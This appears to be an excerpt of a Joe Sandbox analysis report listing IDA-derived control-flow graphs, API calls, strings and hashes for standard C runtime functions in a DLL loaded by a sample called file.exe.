                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 18764a49dd74779db4d2ac4bd31e2d3da26f952e5b89e6fce9b241e129752e38
                                                                                                                                                                    • Instruction ID: 27d4ea4fba30daa86cd5e1a54ce96bb377471dd7c6b484f4677065197cca2de0
                                                                                                                                                                    • Opcode Fuzzy Hash: 18764a49dd74779db4d2ac4bd31e2d3da26f952e5b89e6fce9b241e129752e38
                                                                                                                                                                    • Instruction Fuzzy Hash: 83311C72A5061A8FCF04CEBCC8A53DF3BE19B03320F145A15C975EB7D0C23A59459B90
                                                                                                                                                                    Function 6E8022E0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e6e40c8c807e894aa33b3e7aa1c42b2692e739b8043a902f60af47b52e6fe70a
                                                                                                                                                                    • Instruction ID: 3b5b9015b02cba98d682788f2787ff411e1be10fdec02d16ccebf577acbfb2a1
                                                                                                                                                                    • Opcode Fuzzy Hash: e6e40c8c807e894aa33b3e7aa1c42b2692e739b8043a902f60af47b52e6fe70a
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E318B32A8051A8FCF04CEFDC9A53EF77E29703320F125919C965DB6A7C66E450E8792
                                                                                                                                                                    Function 6E80F46C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1678 6e80f46c-6e80f497 call 6e80ffc9 1681 6e80f80b-6e80f810 call 6e8112eb 1678->1681 1682 6e80f49d-6e80f4a0 1678->1682 1682->1681 1683 6e80f4a6-6e80f4af 1682->1683 1685 6e80f4b5-6e80f4b9 1683->1685 1686 6e80f5ac-6e80f5b2 1683->1686 1685->1686 1688 6e80f4bf-6e80f4c6 1685->1688 1689 6e80f5ba-6e80f5c8 1686->1689 1690 6e80f4c8-6e80f4cf 1688->1690 1691 6e80f4de-6e80f4e3 1688->1691 1692 6e80f774-6e80f777 1689->1692 1693 6e80f5ce-6e80f5d2 1689->1693 1690->1691 1694 6e80f4d1-6e80f4d8 1690->1694 1691->1686 1695 6e80f4e9-6e80f4f1 call 6e80eaae 1691->1695 1696 6e80f779-6e80f77c 1692->1696 1697 6e80f79a-6e80f7a3 call 6e80eaae 1692->1697 1693->1692 1698 6e80f5d8-6e80f5df 1693->1698 1694->1686 1694->1691 1710 6e80f7a5-6e80f7a9 1695->1710 1711 6e80f4f7-6e80f510 call 6e80eaae * 2 1695->1711 1696->1681 1703 6e80f782-6e80f797 call 6e80f811 1696->1703 1697->1681 1697->1710 1699 6e80f5e1-6e80f5e8 1698->1699 1700 6e80f5f7-6e80f5fd 1698->1700 1699->1700 1704 6e80f5ea-6e80f5f1 1699->1704 1705 6e80f603-6e80f62a call 6e80ec43 1700->1705 1706 6e80f714-6e80f718 1700->1706 1703->1697 1704->1692 1704->1700 1705->1706 1721 6e80f630-6e80f633 1705->1721 1714 6e80f724-6e80f730 1706->1714 1715 6e80f71a-6e80f723 call 6e80e71e 1706->1715 1711->1681 1736 6e80f516-6e80f51c 1711->1736 1714->1697 1719 6e80f732-6e80f73c 1714->1719 1715->1714 1723 6e80f74a-6e80f74c 1719->1723 1724 6e80f73e-6e80f740 1719->1724 1729 6e80f636-6e80f64b 1721->1729 1727 6e80f763-6e80f770 call 6e80fe8a 1723->1727 1728 6e80f74e-6e80f761 call 6e80eaae * 2 1723->1728 1724->1697 1725 6e80f742-6e80f746 1724->1725 1725->1697 1730 6e80f748 1725->1730 1745 6e80f772 1727->1745 1746 6e80f7cf-6e80f7e4 call 6e80eaae * 2 1727->1746 1754 6e80f7aa call 6e811255 1728->1754 1733 6e80f651-6e80f654 1729->1733 1734 6e80f6f5-6e80f708 1729->1734 1730->1728 1733->1734 1739 6e80f65a-6e80f662 1733->1739 1734->1729 1738 6e80f70e-6e80f711 1734->1738 1741 6e80f548-6e80f550 call 6e80eaae 1736->1741 1742 6e80f51e-6e80f522 1736->1742 1738->1706 1739->1734 1744 6e80f668-6e80f67c 1739->1744 1764 6e80f552-6e80f572 call 6e80eaae * 2 call 6e80fe8a 1741->1764 1765 6e80f5b4-6e80f5b7 1741->1765 1742->1741 1747 6e80f524-6e80f52b 1742->1747 1749 6e80f67f-6e80f690 1744->1749 1745->1697 1772 6e80f7e6 1746->1772 1773 6e80f7e9-6e80f806 call 6e80ee2f call 6e80fd8a call 6e80ff47 call 6e80fd01 1746->1773 1752 6e80f52d-6e80f534 1747->1752 1753 6e80f53f-6e80f542 1747->1753 1755 6e80f692-6e80f6a3 call 6e80f947 1749->1755 1756 6e80f6b6-6e80f6c3 1749->1756 1752->1753 1762 6e80f536-6e80f53d 1752->1762 1753->1681 1753->1741 1768 6e80f7af-6e80f7ca call 6e80e71e call 6e80fafb call 6e80cd64 1754->1768 1775 6e80f6a5-6e80f6ae 1755->1775 1776 6e80f6c7-6e80f6ef call 6e80f3ec 1755->1776 1756->1749 1760 6e80f6c5 1756->1760 1767 6e80f6f2 1760->1767 1762->1741 1762->1753 1764->1765 1792 6e80f574-6e80f579 1764->1792 1765->1689 1767->1734 1768->1746 1772->1773 1773->1681 1775->1755 1777 6e80f6b0-6e80f6b3 1775->1777 1776->1767 1777->1756 1792->1754 1794 6e80f57f-6e80f592 call 6e80fb13 1792->1794 1794->1768 1799 6e80f598-6e80f5a4 1794->1799 1799->1754 1800 6e80f5aa 1799->1800 1800->1794
                                                                                                                                                                    APIs
                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6E80F58B
                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6E80F699
                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6E80F7EB
                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6E80F806
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                    • Opcode ID: 88fd50f85d4f033c25be4c660d09159699fe1a0ad12e51331df6e6dc2be219a7
                                                                                                                                                                    • Instruction ID: bf97d1733f1d93b43168c83456ddf94357961d6c99773866e7885940f6cbb40e
                                                                                                                                                                    • Opcode Fuzzy Hash: 88fd50f85d4f033c25be4c660d09159699fe1a0ad12e51331df6e6dc2be219a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 93B1797180020AEFDF15CFE8CC8099EB7B9FF68314B20895AE8106B255D735DA51CF96
                                                                                                                                                                    Function 6E8151F4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1801 6e8151f4-6e81520d 1802 6e815223-6e815228 1801->1802 1803 6e81520f-6e81521f call 6e8166e4 1801->1803 1805 6e815235-6e81525b call 6e813187 1802->1805 1806 6e81522a-6e815232 1802->1806 1803->1802 1809 6e815221 1803->1809 1811 6e8153d1-6e8153e2 call 6e80b8f0 1805->1811 1812 6e815261-6e81526c 1805->1812 1806->1805 1809->1802 1814 6e815272-6e815277 1812->1814 1815 6e8153c4 1812->1815 1817 6e815290 1814->1817 1818 6e815279-6e815282 call 6e818cb0 1814->1818 1819 6e8153c6 1815->1819 1822 6e815291 call 6e811be2 1817->1822 1818->1819 1827 6e815288-6e81528e 1818->1827 1821 6e8153c8-6e8153cf call 6e814b2e 1819->1821 1821->1811 1823 6e815296-6e81529b 1822->1823 1823->1819 1826 6e8152a1 1823->1826 1829 6e8152a7-6e8152ac 1826->1829 1827->1829 1829->1819 1830 6e8152b2-6e8152c7 call 6e813187 1829->1830 1830->1819 1833 6e8152cd-6e8152e8 call 6e813738 1830->1833 1833->1819 1836 6e8152ee-6e8152f6 1833->1836 1837 6e815330-6e81533c 1836->1837 1838 6e8152f8-6e8152fd 1836->1838 1839 6e8153b9 1837->1839 1840 6e81533e-6e815340 1837->1840 1838->1821 1841 6e815303-6e815305 1838->1841 1844 6e8153bb-6e8153c2 call 6e814b2e 1839->1844 1842 6e815342-6e81534b call 6e818cb0 1840->1842 1843 6e815355 1840->1843 1841->1819 1845 6e81530b-6e815325 call 6e813738 1841->1845 1842->1844 1854 6e81534d-6e815353 1842->1854 1847 6e815356 call 6e811be2 1843->1847 1844->1819 1845->1821 1856 6e81532b 1845->1856 1851 6e81535b-6e815360 1847->1851 1851->1844 1855 6e815362 1851->1855 1857 6e815368-6e81536d 1854->1857 1855->1857 1856->1819 1857->1844 1858 6e81536f-6e815387 call 6e813738 1857->1858 1858->1844 1861 6e815389-6e815390 1858->1861 1862 6e8153b1-6e8153b7 1861->1862 1863 6e815392-6e815393 1861->1863 1864 6e815394-6e8153a6 call 6e813241 1862->1864 1863->1864 1864->1844 1867 6e8153a8-6e8153af call 6e814b2e 1864->1867 1867->1821
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 6E815279
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 6E815342
                                                                                                                                                                    • __freea.LIBCMT ref: 6E8153A9
                                                                                                                                                                      • Part of subcall function 6E811BE2: HeapAlloc.KERNEL32(00000000,6E812BEC,?,?,6E812BEC,00000220,?,00000000,?), ref: 6E811C14
                                                                                                                                                                    • __freea.LIBCMT ref: 6E8153BC
                                                                                                                                                                    • __freea.LIBCMT ref: 6E8153C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 1096550386-246349140
                                                                                                                                                                    • Opcode ID: 9b5937f633efa17beaccccaf780fb8d91388674ee8ceeb55eac01adb4b7cea94
                                                                                                                                                                    • Instruction ID: 2e3ecc3b7ab76f4ba10c6e3983edfb6ab3673a98f7a9f443c7a37eb360e76e40
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b5937f633efa17beaccccaf780fb8d91388674ee8ceeb55eac01adb4b7cea94
                                                                                                                                                                    • Instruction Fuzzy Hash: 82519172608307AFEB158FE98C94EEB3AADEF46714B110D29FD14D71A0EBB0DC509660
                                                                                                                                                                    Function 6E81343F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1870 6e81343f-6e81344b 1871 6e8134dd-6e8134e0 1870->1871 1872 6e813450-6e813461 1871->1872 1873 6e8134e6 1871->1873 1875 6e813463-6e813466 1872->1875 1876 6e81346e-6e813487 LoadLibraryExW 1872->1876 1874 6e8134e8-6e8134ec 1873->1874 1877 6e813506-6e813508 1875->1877 1878 6e81346c 1875->1878 1879 6e813489-6e813492 GetLastError 1876->1879 1880 6e8134ed-6e8134fd 1876->1880 1877->1874 1882 6e8134da 1878->1882 1883 6e813494-6e8134a6 call 6e811413 1879->1883 1884 6e8134cb-6e8134d8 1879->1884 1880->1877 1881 6e8134ff-6e813500 FreeLibrary 1880->1881 1881->1877 1882->1871 1883->1884 1887 6e8134a8-6e8134ba call 6e811413 1883->1887 1884->1882 1887->1884 1890 6e8134bc-6e8134c9 LoadLibraryExW 1887->1890 1890->1880 1890->1884
                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,6E81354E,00000000,6E811048,00000000,00000000,00000001,?,6E8136C7,00000022,FlsSetValue,6E81B390,6E81B398,00000000), ref: 6E813500
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                    • Opcode ID: 1f6ae62fa8f60c9fdd639a56cd06728f29a9f635410f73b9536d574ef9971366
                                                                                                                                                                    • Instruction ID: 90c23a52329c7844c2e783c323cec37ef1b9661578d0ab45d3f7b8621b5b042c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f6ae62fa8f60c9fdd639a56cd06728f29a9f635410f73b9536d574ef9971366
                                                                                                                                                                    • Instruction Fuzzy Hash: 3821AB31A0C517ABDB229BE9DD55BCA3768DB537B0B120964ED19A72C4D730ED04C6E0
                                                                                                                                                                    Function 6E810975 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1891 6e810975-6e8109b2 GetModuleHandleExW 1892 6e8109d5-6e8109d9 1891->1892 1893 6e8109b4-6e8109c6 GetProcAddress 1891->1893 1895 6e8109e4-6e8109f1 1892->1895 1896 6e8109db-6e8109de FreeLibrary 1892->1896 1893->1892 1894 6e8109c8-6e8109d3 1893->1894 1894->1892 1896->1895
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,48EB6D7D,00000000,?,00000000,6E818DC2,000000FF,?,6E81090F,?,?,6E8108E3,?), ref: 6E8109AA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E8109BC
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,6E818DC2,000000FF,?,6E81090F,?,?,6E8108E3,?), ref: 6E8109DE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll$}mH
                                                                                                                                                                    • API String ID: 4061214504-503396529
                                                                                                                                                                    • Opcode ID: 6640ff4253f9442deda50d168dc6dce7b4f0fbee6ee0737380d2c12f030bc7a8
                                                                                                                                                                    • Instruction ID: 2c40519949665153179a78f8758b87ce593c48149704a6698d9decb50a7cacfb
                                                                                                                                                                    • Opcode Fuzzy Hash: 6640ff4253f9442deda50d168dc6dce7b4f0fbee6ee0737380d2c12f030bc7a8
                                                                                                                                                                    • Instruction Fuzzy Hash: 7401673190491BEFDF018B94CC19BEE77B9FB05754F000929E826A2790EB749904CB90
                                                                                                                                                                    Function 6E815901 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1898 6e815901-6e815971 GetConsoleOutputCP 1899 6e815973-6e815975 call 6e811330 1898->1899 1900 6e81597a-6e815998 1898->1900 1899->1900 1902 6e815ca7-6e815cc2 call 6e80b8f0 1900->1902 1903 6e81599e-6e8159a3 1900->1903 1905 6e8159a6-6e8159be 1903->1905 1907 6e815af0-6e815b01 1905->1907 1908 6e8159c4-6e8159d2 1905->1908 1910 6e815b21-6e815b30 1907->1910 1911 6e815b03-6e815b1f 1907->1911 1909 6e8159d5-6e8159d8 1908->1909 1915 6e8159e1-6e8159eb 1909->1915 1916 6e8159da-6e8159df 1909->1916 1913 6e815b61-6e815b66 1910->1913 1914 6e815b32-6e815b3b 1910->1914 1912 6e815b67-6e815b76 call 6e8142c9 1911->1912 1912->1902 1931 6e815b7c 1912->1931 1913->1912 1917 6e815b41-6e815b56 call 6e8142c9 1914->1917 1918 6e815c7e-6e815c9d 1914->1918 1920 6e8159f1-6e815a09 1915->1920 1921 6e815a95-6e815aa5 1915->1921 1916->1909 1916->1915 1917->1902 1935 6e815b5c-6e815b5f 1917->1935 1918->1902 1926 6e815c30-6e815c32 1920->1926 1927 6e815a0f-6e815a11 1920->1927 1924 6e815aab-6e815adb call 6e81658d 1921->1924 1925 6e815c5d-6e815c5f 1921->1925 1924->1902 1943 6e815ae1 1924->1943 1930 6e815c58-6e815c5b 1925->1930 1933 6e815c61 1925->1933 1929 6e815c34-6e815c37 1926->1929 1926->1930 1934 6e815a14-6e815a1e 1927->1934 1936 6e815c3a-6e815c53 1929->1936 1930->1902 1937 6e815b7f-6e815ba3 call 6e813241 1931->1937 1939 6e815c64-6e815c7a 1933->1939 1934->1934 1940 6e815a20-6e815a27 1934->1940 1935->1937 1936->1936 1941 6e815c55 1936->1941 1937->1902 1953 6e815ba9-6e815bbe WriteFile 1937->1953 1939->1939 1944 6e815c7c 1939->1944 1945 6e815a29-6e815a39 call 6e80c7f0 1940->1945 1946 6e815a3c-6e815a41 1940->1946 1941->1930 1950 6e815ae4-6e815aeb 1943->1950 1944->1941 1945->1946 1948 6e815a44-6e815a54 1946->1948 1948->1948 1952 6e815a56-6e815a8d call 6e81658d 1948->1952 1950->1937 1952->1902 1961 6e815a93 1952->1961 1955 6e815bc4-6e815bdb 1953->1955 1956 6e815c9f-6e815ca5 GetLastError 1953->1956 1955->1902 1957 6e815be1-6e815be5 1955->1957 1956->1902 1959 6e815c23-6e815c26 1957->1959 1960 6e815be7-6e815c04 WriteFile 1957->1960 1959->1902 1963 6e815c28-6e815c2b 1959->1963 1960->1956 1962 6e815c0a-6e815c0e 1960->1962 1961->1950 1962->1902 1964 6e815c14-6e815c20 1962->1964 1963->1905 1964->1959
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(48EB6D7D,00000000,00000000,?), ref: 6E815964
                                                                                                                                                                      • Part of subcall function 6E813241: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E81539F,?,00000000,-00000008), ref: 6E8132A2
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E815BB6
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E815BFC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E815C9F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 2112829910-246349140
                                                                                                                                                                    • Opcode ID: c16d31dc69007e7e78b463baa465789ed32d2f5e1e1b460f3a244eeb692af794
                                                                                                                                                                    • Instruction ID: 25b193564df1a1e32c8f0ab301baa6c2f9a528e86e37856aa5175845cb7104a0
                                                                                                                                                                    • Opcode Fuzzy Hash: c16d31dc69007e7e78b463baa465789ed32d2f5e1e1b460f3a244eeb692af794
                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED15D75D0864A9FDB01CFE8C8809DDBBB5FF49314F14496AE866EB291E730A941CF50
                                                                                                                                                                    Function 6E80EABC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000001,?,6E80E6F1,6E80BFC8,6E80B98F,?,6E80BBC7,?,00000001,?,?,00000001,?,6E81EDC8,0000000C,6E80BCC0), ref: 6E80EACA
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E80EAD8
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E80EAF1
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E80BBC7,?,00000001,?,?,00000001,?,6E81EDC8,0000000C,6E80BCC0,?,00000001,?), ref: 6E80EB43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    • Opcode ID: c454809706add6be714ec56f66e672c979ceeeda1a3fbfcb6438c2a78fbba790
                                                                                                                                                                    • Instruction ID: 662b9042afe205d10cfd38c3660d6131400943cb79ad9eff9510559d7efc0ecf
                                                                                                                                                                    • Opcode Fuzzy Hash: c454809706add6be714ec56f66e672c979ceeeda1a3fbfcb6438c2a78fbba790
                                                                                                                                                                    • Instruction Fuzzy Hash: 4801B13211EB125EFF5516FDAC95A9B2759EB077B87304F2AF529640D0FF1148419384
                                                                                                                                                                    Function 6E812673 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Users\user\Desktop\file.exe, xrefs: 6E81268F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                                                    • API String ID: 0-3695852857
                                                                                                                                                                    • Opcode ID: b5debffc06293f2b65fd3a1a529a06d8ed4ba336be67cfa4e052a0cc3441f666
                                                                                                                                                                    • Instruction ID: 0f7b5f54d23384bbc4479c4b7ef6528f99d203e3d134bb76d02f8900942f8ad3
                                                                                                                                                                    • Opcode Fuzzy Hash: b5debffc06293f2b65fd3a1a529a06d8ed4ba336be67cfa4e052a0cc3441f666
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21847161C317AF9B519FF99C80ADB77BDAF063687108D18E91897190EB34EC609790
